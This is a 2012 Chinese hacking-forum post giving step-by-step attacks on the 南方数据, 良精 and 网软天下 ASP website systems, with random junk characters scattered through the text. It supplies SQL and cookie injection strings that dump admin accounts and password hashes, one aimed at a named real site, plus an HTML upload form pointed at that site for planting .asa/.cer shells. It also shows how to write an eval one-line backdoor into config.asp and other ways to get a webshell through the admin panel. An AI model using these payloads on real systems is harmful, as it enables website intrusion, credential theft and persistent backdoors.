找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2937|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb, c5 |" J  `% a! e
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 / b' T/ u+ Z3 j/ d+ B* ~, n
也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
3 S5 r/ ~+ W! F) t直接暴管理员帐号密码(md5)0 y) [/ o# u+ [: z5 |- I% R0 l6 ^9 Q
2.登陆后台
- f7 }" V) E- U3.利用编辑器上传:) U4 H/ t( {! j1 ^8 q
访问admin/southidceditor/admin_style.asp' u, W2 _5 F, f% X$ K! j
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
' R) u, w  s% D7 ^& ?6 R* p2 m7 m
========================================
$ M/ M8 B. C- F: R, O% }# U: y5 i- t0 k! g7 M$ t9 h6 m* i
参考资料整理:* W$ N3 c1 L% t' T# [2 A, g) t! S
南方数据、良精系统、网软天下漏洞利用
: R- D7 z2 H' w# Y- h3 L8 x7 Q/ D
2 a3 }0 P: E+ E8 ^# Z" T: ^6 J1、通过upfile_other.asp漏洞文件直接取SHELL+ N3 J) {. Q+ A* b" q3 C) U
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:
; `5 N+ g2 T6 i<HTML><HEAD> 0 U/ J5 v: ~; _
<META http-equiv=Content-Type content="text/html; charset=gb2312">
! P( J+ _! r* y, `. i<STYLE type=text/css>BODY {
# h6 r- l% Q# f# A/ B8 CFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee & Z/ t; H5 O& ^, h9 E; u" s
} ( h( u1 O1 c0 l; D2 m( ]# d, s. |
.tx1 {
: o6 a4 x9 N! j* _+ Q2 a1 dBORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
! c0 e! i- R. ^9 f6 `}
2 y- k2 p; x: ^6 q</STYLE>
% [# D+ o6 U9 b2 Q<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>
* m6 g7 m* O6 c" m<BODY leftMargin=0 topMargin=0> " `/ S- o9 }) Y$ q) c' s! j, P* p
<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
) Q! F2 f$ p0 P# dencType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
  V! K4 i5 D) K0 h, A. x: s7 |<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>3 |0 p- {# c  m, G
8 R/ o$ O* s6 x3 Z( `
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
* d4 ?& W; D3 S1 O: P) B8 z注:此方法通杀南方数据、良精系统、网软天下等6 \2 j* P/ A0 S3 }* F$ o7 J

$ N2 s8 f4 V7 Y/ Q+ m  ~2、通过注入秒杀管理员帐号密码,使用如下:
( Q6 u+ ^( _4 v7 g4 D3 a4 B: ghttp://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’- ^; H7 l) {1 _! j; c% b% L! E
以上代码直接暴管理员帐号和密码,取SHELL方法如下:
% `) G7 s- v; ^/ W  `. a在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’, {3 o7 v/ h- Q; X2 {9 `
成功把shell写入http://www.target.com/inc/config.asp
* _. k: F  ^. B$ ~( f* V这里一句话chr(32)密码是“#”' ~( z$ q$ R4 q. L5 T  R( T
3、cookie注入# w6 r+ Q6 L  r
清空地址栏,利用union语句来注入,提交:
/ q1 \1 ~2 s* l' L  O( ujavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin")), F7 M0 \" ^4 J
如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?
! o0 `! X# V3 P4 q9 T注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。, F0 o5 Q' ?* q/ P1 U( m! B
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
% ~7 r  G" J- [/ u0 @, r1 Q% z+ K8 w$ p1 {" P$ Q
三、后台取SHELL方法总结
( v) y( x9 `" a, n  L3 l. J(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
/ j  }! `! }" E& r: [0 p然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
  ]* w$ Y. s; ?: B; R这时再打开一句话马的客户端,提交同样得到一个小马
8 l8 l  r& W% h; Y6 n0 m7 R(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)% Q6 T& U$ h  c3 ]
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:( f$ [1 x$ C; l; q
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then
" \0 d; \  m& \; _, @EnableUpload=false2 @1 U8 U" l. O) D, t1 F

# T. G) i& T& B" d" U- `' }7 t' e4 gend if
6 W8 H, P, G, s; O0 V- fif EnableUpload=false then; a1 Y6 [2 N$ ]7 n- p
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
" b8 v, N$ \: S; ~* E. E* V& ^FoundErr=true9 V+ k  \9 J1 `( H- h
end if9 D2 M* ^% H, c6 I& `
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:! L# c% ]+ \1 G) f; u0 V! F
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)  Z7 n  N6 o# P% ^. L
(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的0 d& A; O) Y% Y3 w2 f  [, Q

2 i/ g- \: f! G5 k3 q/ f- j点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
" f: m5 C7 r7 ?1 L7 v8 A直接访问备份后的地址,就得到一个webshell  t3 Y8 z, d* c+ I! W: ^' b0 t
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表